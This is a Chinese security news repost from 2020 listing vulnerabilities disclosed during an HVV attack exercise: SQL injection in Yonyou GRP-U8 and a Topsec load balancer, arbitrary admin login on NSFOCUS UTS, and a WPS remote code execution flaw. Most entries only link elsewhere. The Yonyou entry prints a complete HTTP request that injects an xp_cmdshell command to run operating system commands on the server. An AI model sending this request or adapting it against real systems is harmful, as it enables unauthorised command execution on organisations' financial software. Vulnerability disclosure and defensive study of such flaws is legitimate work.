用友GRP注入、天融信注入、绿盟UTS任意登陆、WPS RCE漏洞

admin 2020年9月17日15:00:50评论309 views字数 1003阅读3分20秒阅读模式

紧张刺激的HVV开始了,第一天就出来这些0day。

有的漏洞详情较长,不太想排版编辑,大家就点击一下链接凑合看吧。

其中WPS RCE的漏洞为9月初就爆出来了


用友GRP-U8 SQL注入

https://www.hedysx.com/2599.html

POST /Proxy HTTP/1.1Accept: Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: hostContent-Length: 357Connection: Keep-AliveCache-Control: no-cache    cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

用友GRP注入、天融信注入、绿盟UTS任意登陆、WPS RCE漏洞


天融信Top-app LB负载均衡SQL注入漏洞

https://www.hedysx.com/2601.html

用友GRP注入、天融信注入、绿盟UTS任意登陆、WPS RCE漏洞


绿盟UTS综合威胁探针管理员任意登录-可替换MD5


绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。

绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。


漏洞详情:https://www.hedysx.com/2612.html

用友GRP注入、天融信注入、绿盟UTS任意登陆、WPS RCE漏洞


WPS RCE

https://www.hedysx.com/2622.html

用友GRP注入、天融信注入、绿盟UTS任意登陆、WPS RCE漏洞


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月17日15:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友GRP注入、天融信注入、绿盟UTS任意登陆、WPS RCE漏洞http://cn-sec.com/archives/135803.html

发表评论

匿名网友 填写信息